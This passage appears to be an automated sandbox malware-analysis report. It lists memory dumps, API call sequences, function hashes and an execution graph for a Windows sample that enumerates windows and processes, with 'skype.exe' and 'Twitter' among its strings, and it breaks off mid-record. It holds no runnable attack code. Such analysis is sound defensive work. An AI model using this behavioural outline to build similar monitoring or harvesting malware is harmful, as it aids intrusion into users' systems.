                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Heap$BitsFreeProcess
                                                                                                                                                                                                                                                      • String ID: $(
                                                                                                                                                                                                                                                      • API String ID: 2731446349-55695022
                                                                                                                                                                                                                                                      • Opcode ID: 2632ad87318b3fcf4a1b5c358fd7aa1ffc99cc22d3695258e023486a58b0e553
                                                                                                                                                                                                                                                      • Instruction ID: 4904ecbf025400fe124500fb1229366758f519bf40d44cf8624181d92b3334f2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2632ad87318b3fcf4a1b5c358fd7aa1ffc99cc22d3695258e023486a58b0e553
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 790148B5E00219ABCF109FA6D8498DFBFB8EF88754F00801AF914B6250D7749665CBE9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 00415701
                                                                                                                                                                                                                                                      • GetWindowTextA.USER32(?,?,00000078), ref: 00415711
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: SleepTextWindow
                                                                                                                                                                                                                                                      • String ID: Twitter
                                                                                                                                                                                                                                                      • API String ID: 1325625986-3654763050
                                                                                                                                                                                                                                                      • Opcode ID: 064e06eff7cba56788296dd554277bd5bcdb24fe66745113e8d5994929ac3a61
                                                                                                                                                                                                                                                      • Instruction ID: 2a0e3f0a641bcea6516841aa513571c01fddd2f65c57e64924d831f9732283cf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 064e06eff7cba56788296dd554277bd5bcdb24fe66745113e8d5994929ac3a61
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0DF02271A04114EFDB10DB60D84AEEA7BA8FF04304F50806BF815C72D1EB38E885C759
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0041425E: lstrlenA.KERNEL32(?), ref: 0041426F
                                                                                                                                                                                                                                                        • Part of subcall function 0041425E: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041427A
                                                                                                                                                                                                                                                      • EnumWindows.USER32(0041BD1B,00000000), ref: 0041BDD7
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00003A98), ref: 0041BDE8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateEnumSleepSnapshotToolhelp32Windowslstrlen
                                                                                                                                                                                                                                                      • String ID: skype.exe
                                                                                                                                                                                                                                                      • API String ID: 568560734-1432977592
                                                                                                                                                                                                                                                      • Opcode ID: 195c3d88171c88d8f7043fcc9466e7f6e64139ac7150497d749be01f041bee4e
                                                                                                                                                                                                                                                      • Instruction ID: 026ce47b98fb0bb3bc023706c8bb28edd12f1aeb61dc9ca88d7459c219cc4209
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 195c3d88171c88d8f7043fcc9466e7f6e64139ac7150497d749be01f041bee4e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2AE02B707883487BDB508360BC077CA3BD8C745709F440096B801A12C2D3A9455A87AA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$lstrcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 805584807-0
                                                                                                                                                                                                                                                      • Opcode ID: 42776acb7bce5c27189888d2a9de8f8945e830438a7174f3204c5183a69b064c
                                                                                                                                                                                                                                                      • Instruction ID: 96f37f27a1d7b8f444bb90a79290ca923e7c0fa8b5e68154ea7ad4550ee58f52
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42776acb7bce5c27189888d2a9de8f8945e830438a7174f3204c5183a69b064c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A2109759011596AC760EBB9AD45ECFBAB8DFC234CF64007BE804E2302D65CC98483BE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • HeapReAlloc.KERNEL32(00000000,00000050,76AF0A60,00427DAF,76AF0A60,?), ref: 004277E5
                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000008,000041C4,00000000,76AF0A60,00427DAF,76AF0A60,?), ref: 0042781E
                                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 0042783C
                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?), ref: 00427853
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AllocHeap$FreeVirtual
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3499195154-0
                                                                                                                                                                                                                                                      • Opcode ID: d135cb4e0b7d26a06ac5bb90502da04306d4e935439ad1e294e4bac729d4f9a3
                                                                                                                                                                                                                                                      • Instruction ID: 60f43418b8eae798e520781b2bf5e10e5e109c30edcb60b24f9c49ec37ffbfdf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d135cb4e0b7d26a06ac5bb90502da04306d4e935439ad1e294e4bac729d4f9a3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2118F303046519FC7319F29FC49922BBB5FB81362F90463AF562D35B0E3B09956CB4A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0044F79C), ref: 00402591
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0044F79C), ref: 004025B3
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0044F79C), ref: 004025CB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2978645861-0
                                                                                                                                                                                                                                                      • Opcode ID: b30226d69d6c95a009fbb70f1d4c4ea9603497d6b275be95153cdd82f531740d
                                                                                                                                                                                                                                                      • Instruction ID: 3653cf5cc612b0023f781b6b4dba6d175b77ea69c2ca912229ac705fca8a1e44
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b30226d69d6c95a009fbb70f1d4c4ea9603497d6b275be95153cdd82f531740d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67F0A431105210FFDB106F24ED1D85A3BA8FF463657504037FC05E22D0EFB9AA12A66D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(0044F79C,00000000,?,00411555,00000000,0044F79C,0000000C,0044F79C,0041159B,?), ref: 004144D0
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(00000000,0044F79C,00000000,?,00411555,00000000,0044F79C,0000000C,0044F79C,0041159B,?), ref: 004144DC
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(0044F79C,?,00411555,00000000,0044F79C,0000000C,0044F79C,0041159B,?), ref: 004144F1
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,0044F79C,?,00411555,00000000,0044F79C,0000000C,0044F79C,0041159B,?), ref: 00414505
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$lstrcmplstrcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3985954171-0
                                                                                                                                                                                                                                                      • Opcode ID: 00f4a7b12345b7478585a4820a68565f009b8fdd1a8706a2b7f12ee67cc71e5c
                                                                                                                                                                                                                                                      • Instruction ID: 7cd2a430f1160ec2a51e39b2ae96134d5fee5d311598402a0e4aec16addf71a8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 00f4a7b12345b7478585a4820a68565f009b8fdd1a8706a2b7f12ee67cc71e5c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2F01271200105EFEF216FA5DD099A67BACEF00325710442AFC95D7211DB79E9A1CA69

                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                      Execution Coverage:9.4%
                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                                                      Total number of Nodes:1904
                                                                                                                                                                                                                                                      Total number of Limit Nodes:69
                                                                                                                                                                                                                                                      execution_graph 31575 4269c2 16 API calls 31541 427340 32 API calls 31543 422d49 GetModuleHandleA GetProcAddress ExitProcess GetCurrentProcess TerminateProcess 31577 4251c9 28 API calls 31579 41edcd 164 API calls 31580 41ebd9 173 API calls 31579->31580 31581 425ccd 17 API calls 31546 420e54 6 API calls 31547 42385a 37 API calls 31548 415b59 59 API calls 31584 4223d8 6 API calls 31549 42105f GetWindowTextA EnableWindow 31550 403f74 360 API calls 31585 4091e1 EnumResourceLanguagesA 31551 422261 GetModuleHandleA GetProcAddress 31552 409264 FindResourceA 31588 4283e4 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 31553 406a67 89 API calls 31589 41c7e9 EnterCriticalSection Sleep EnumWindows Sleep LeaveCriticalSection 31590 41c66f 74 API calls 31589->31590 31591 4291ef 32 API calls 31593 426cf3 6 API calls 31556 424779 17 API calls 29374 410b01 EnterCriticalSection 29382 41040c 29374->29382 29377 410b38 LeaveCriticalSection 29379 410b2f 29417 410c3b 29379->29417 29420 413732 29382->29420 29387 4104ab lstrcpyA lstrcatA 29388 410335 14 API calls 29387->29388 29390 4104e6 29388->29390 29389 410c3b 2 API calls 29391 4104a2 29389->29391 29392 410501 29390->29392 29394 410c3b 2 API calls 29390->29394 29391->29387 29437 4140ca SHGetSpecialFolderLocation SHGetPathFromIDListA SHGetMalloc 29392->29437 29394->29392 29395 410518 lstrcatA 29396 410335 14 API calls 29395->29396 29397 410541 29396->29397 29398 41055c 29397->29398 29400 410c3b 2 API calls 29397->29400 29399 4140ca 4 API calls 29398->29399 29401 410573 lstrcatA 29399->29401 29400->29398 29402 410335 14 API calls 29401->29402 29403 41059c 29402->29403 29404 4105c0 GetWindowsDirectoryA lstrcatA lstrcatA 29403->29404 29406 410c3b 2 API calls 29403->29406 29405 410335 14 API calls 29404->29405 29409 410607 29405->29409 29408 4105b7 29406->29408 29407 41062b lstrcpyA lstrcatA 29410 410335 14 API calls 29407->29410 29408->29404 29409->29407 29411 410c3b 2 API calls 29409->29411 29412 410664 29410->29412 29413 410622 29411->29413 29414 41067b 29412->29414 29415 410c3b 2 API calls 29412->29415 29413->29407 29414->29377 29416 403cb4 6 API calls 29414->29416 29415->29414 29416->29379 29418 410c42 GetProcessHeap RtlFreeHeap 29417->29418 29419 410b35 29417->29419 29418->29419 29419->29377 29440 4136ff lstrlenA 29420->29440 29425 410335 29451 41382b CreateFileA GetFileSize CloseHandle 29425->29451 29427 410366 29428 4103f2 29427->29428 29452 410bf4 GetProcessHeap 29427->29452 29428->29387 29428->29389 29430 41037d CreateFileA 29431 4103a1 ReadFile CloseHandle 29430->29431 29436 4103dd 29430->29436 29433 413663 2 API calls 29431->29433 29432 410c3b 2 API calls 29432->29428 29434 4103d5 29433->29434 29456 41a679 lstrcpyA 29434->29456 29436->29428 29436->29432 29438 414104 lstrcatA 29437->29438 29438->29395 29441 413717 29440->29441 29442 413663 29441->29442 29446 413410 29442->29446 29445 410456 lstrcpyA 29445->29425 29447 413422 29446->29447 29448 413447 lstrlenA 29447->29448 29450 41a679 lstrcpyA 29447->29450 29448->29445 29450->29448 29451->29427 29453 410c1f RtlAllocateHeap 29452->29453 29454 410c28 29453->29454 29455 410c0f Sleep GetProcessHeap 29453->29455 29454->29430 29455->29453 29456->29436 31558 420f0a 58 API calls 31598 429289 30 API calls 31561 415c11 EnumWindows Sleep 31561->31561 29457 422b93 29458 422b9f 29457->29458 29459 422bab GetVersionExA 29458->29459 29460 422bf3 GetModuleHandleA 29459->29460 29461 422be7 29459->29461 29462 422c0f 29460->29462 29461->29460 29502 425b9f HeapCreate 29462->29502 29464 422c60 29465 422c86 29464->29465 29466 422c73 29464->29466 29467 422c6e 29464->29467 29510 425952 29465->29510 29632 4251dd 16 API calls 29466->29632 29631 425354 16 API calls 29467->29631 29470 422c7a 29633 423d5c GetModuleHandleA GetProcAddress ExitProcess 29470->29633 29475 422c9f GetCommandLineA 29523 425830 29475->29523 29478 422c9e 29478->29475 29481 422cb9 29482 422cc4 29481->29482 29635 422b6e 16 API calls 29481->29635 29553 42555b 29482->29553 29486 422cd5 29565 423d8c 29486->29565 29490 422cec GetStartupInfoA 29569 4254fe 29490->29569 29493 422ceb 29493->29490 29494 422cfe GetModuleHandleA 29573 40da5b InitializeCriticalSection 29494->29573 29498 422d2e 29639 423ed9 GetModuleHandleA GetProcAddress ExitProcess GetCurrentProcess TerminateProcess 29498->29639 29501 422d33 29503 425be9 29502->29503 29504 425bbf 29502->29504 29503->29464 29505 425bce 29504->29505 29506 425bec 29504->29506 29640 427433 HeapAlloc 29505->29640 29506->29464 29508 425bd8 29508->29506 29509 425bdd HeapDestroy 29508->29509 29509->29503 29641 424f20 29510->29641 29512 422c93 29512->29475 29634 422b6e 16 API calls 29512->29634 29514 4259a1 GetStartupInfoA 29515 425a81 29514->29515 29522 4259bb 29514->29522 29516 425aa8 GetStdHandle 29515->29516 29517 425ae8 SetHandleCount 29515->29517 29516->29515 29518 425ab6 GetFileType 29516->29518 29517->29512 29518->29515 29519 424f20 6 API calls 29519->29522 29520 425a2d 29520->29515 29521 425a4f GetFileType 29520->29521 29521->29520 29522->29515 29522->29519 29522->29520 29524 42586b 29523->29524 29525 42584c GetEnvironmentStringsW 29523->29525 29527 425854 29524->29527 29528 4258fb 29524->29528 29526 425860 GetLastError 29525->29526 29525->29527 29526->29524 29530 425882 GetEnvironmentStringsW 29527->29530 29531 42588a WideCharToMultiByte 29527->29531 29529 425907 GetEnvironmentStrings 29528->29529 29532 422caf 29528->29532 29529->29532 29533 425913 29529->29533 29530->29531 29530->29532 29535 4258f0 FreeEnvironmentStringsW 29531->29535 29536 4258be 29531->29536 29546 42578e 29532->29546 29537 424f20 6 API calls 29533->29537 29535->29532 29538 424f20 6 API calls 29536->29538 29545 42592c 29537->29545 29539 4258c4 29538->29539 29539->29535 29540 4258cd WideCharToMultiByte 29539->29540 29542 4258de 29540->29542 29543 4258e7 29540->29543 29541 425942 FreeEnvironmentStringsA 29541->29532 29649 424e76 HeapFree VirtualFree VirtualFree HeapFree 29542->29649 29543->29535 29545->29541 29547 4257a0 29546->29547 29548 4257a5 GetModuleFileNameA 29546->29548 29650 424db5 53 API calls 29547->29650 29550 4257cd 29548->29550 29551 424f20 6 API calls 29550->29551 29552 4257f8 29551->29552 29552->29481 29554 425568 29553->29554 29556 42556d 29553->29556 29651 424db5 53 API calls 29554->29651 29557 424f20 6 API calls 29556->29557 29560 422cca 29556->29560 29562 42559e 29557->29562 29558 4255e7 29652 424e76 HeapFree VirtualFree VirtualFree HeapFree 29558->29652 29560->29486 29636 422b6e 16 API calls 29560->29636 29561 424f20 6 API calls 29561->29562 29562->29558 29562->29560 29562->29561 29563 42560c 29562->29563 29653 424e76 HeapFree VirtualFree VirtualFree HeapFree 29563->29653 29566 423d95 29565->29566 29568 422cdd 29566->29568 29654 426ce1 14 API calls 29566->29654 29568->29490 29637 422b6e 16 API calls 29568->29637 29570 42550a 29569->29570 29571 42550f 29569->29571 29655 424db5 53 API calls 29570->29655 29571->29494 29580 40da7c 29573->29580 29574 40dac0 SetErrorMode 29656 408d16 29574->29656 29577 40daf4 GetSystemDirectoryA lstrcatA 29665 414bf8 29577->29665 29580->29574 29582 40daa6 29580->29582 30205 413761 29580->30205 29585 413761 51 API calls 29582->29585 29584 40db1d 29674 40d4a9 KiUserCallbackDispatcher 29584->29674 29587 40dab1 29585->29587 29587->29574 29589 40dba3 29592 40c54e 6 API calls 29589->29592 29590 40db79 29590->29589 29593 40db7d 29590->29593 29591 40db2e 29682 40c54e 29591->29682 29595 40dbaa 29592->29595 29596 40c54e 6 API calls 29593->29596 29600 40dbb7 lstrcpyA 29595->29600 29605 40db52 29595->29605 29630 40dcab 29595->29630 29601 40db62 29596->29601 29598 40db5b 29604 40c54e 6 API calls 29598->29604 29599 40db3b 29602 40db46 lstrcpyA 29599->29602 29599->29605 30211 40d59d 50 API calls 29600->30211 29601->29605 29606 40db95 lstrcpyA 29601->29606 29601->29630 29602->29605 29604->29601 29688 40a949 29605->29688 29606->29605 29607 40dbcb 29607->29605 29611 40dbf2 12 API calls 29613 40dc70 29611->29613 29614 40dc5a 29611->29614 30088 40d158 29613->30088 30050 40d2ec 29614->30050 29616 40dbdd 29616->29611 30041 413df9 GetModuleHandleA 29616->30041 30047 413dd8 29616->30047 29622 40dc6a 30072 410b43 EnterCriticalSection 29622->30072 29624 40dc7a CreateThread CreateThread 29626 40dca1 29624->29626 29627 40dca6 29624->29627 30401 40c431 29624->30401 30405 40d1d8 29624->30405 30188 410a09 EnterCriticalSection 29626->30188 30191 40c6a0 lstrcpyA lstrlenA 29627->30191 29630->29498 29638 423eb7 GetModuleHandleA GetProcAddress ExitProcess GetCurrentProcess TerminateProcess 29630->29638 29631->29466 29632->29470 29634->29478 29635->29482 29636->29486 29637->29493 29638->29498 29639->29501 29640->29508 29644 424ef4 29641->29644 29645 424f1d 29644->29645 29647 424efb 29644->29647 29645->29512 29645->29514 29647->29645 29648 424eae 6 API calls 29647->29648 29648->29647 29649->29543 29650->29548 29651->29556 29652->29560 29653->29560 29654->29568 29655->29571 29657 408d31 29656->29657 29658 408d42 GetVersionExA 29657->29658 29659 408d65 GetModuleHandleA GetProcAddress 29658->29659 29660 408d58 GetVersionExA 29658->29660 29661 408d85 GetNativeSystemInfo 29659->29661 29662 408d8d GetSystemInfo 29659->29662 29660->29659 29663 408d97 GetModuleHandleA GetProcAddress 29661->29663 29662->29663 29664 408dab 29663->29664 29664->29577 29664->29630 29667 414c06 29665->29667 29666 40db17 29669 40c0b1 GetComputerNameA lstrcpyA 29666->29669 29667->29666 29668 414c40 lstrcpyA 29667->29668 29668->29667 30217 421920 29669->30217 29673 40c14a lstrcatA 29673->29584 29675 40d4e1 29674->29675 29676 40d4b5 29674->29676 29675->29589 29675->29590 29675->29591 29677 413dd8 8 API calls 29676->29677 29678 40d4c0 Sleep 29677->29678 30221 4222f5 72 API calls 29678->30221 29680 40d4d1 Sleep 30222 406145 24 API calls 29680->30222 29683 413663 2 API calls 29682->29683 29684 40c581 OpenMutexA 29683->29684 29685 40c5b9 CloseHandle 29684->29685 29686 40c59d CreateMutexA GetLastError 29684->29686 29687 40c5c4 29685->29687 29686->29685 29686->29687 29687->29598 29687->29599 29689 413410 lstrcpyA 29688->29689 29690 40a968 GetModuleHandleA 29689->29690 29691 40abe1 GetLastError 29690->29691 29692 40a984 29690->29692 29693 40abf6 29691->29693 29694 413410 lstrcpyA 29692->29694 29695 413410 lstrcpyA 29693->29695 29696 40a997 GetProcAddress 29694->29696 29697 40ac09 LoadLibraryA 29695->29697 29698 413410 lstrcpyA 29696->29698 29699 40af6d GetLastError 29697->29699 29700 40ac1d 29697->29700 29701 40a9b6 GetProcAddress 29698->29701 29704 40af78 29699->29704 29702 413410 lstrcpyA 29700->29702 29703 413410 lstrcpyA 29701->29703 29705 40ac30 GetProcAddress 29702->29705 29706 40a9d5 GetProcAddress 29703->29706 29709 413410 lstrcpyA 29704->29709 29707 413410 lstrcpyA 29705->29707 29708 413410 lstrcpyA 29706->29708 29710 40ac4f GetProcAddress 29707->29710 29711 40a9f4 GetProcAddress 29708->29711 29712 40af95 LoadLibraryA 29709->29712 29713 413410 lstrcpyA 29710->29713 29714 413410 lstrcpyA 29711->29714 29715 40b501 GetLastError 29712->29715 29716 40afa9 29712->29716 29718 40ac6e GetProcAddress 29713->29718 29719 40aa13 GetProcAddress 29714->29719 29717 40b50c 29715->29717 29720 413410 lstrcpyA 29716->29720 29724 413410 lstrcpyA 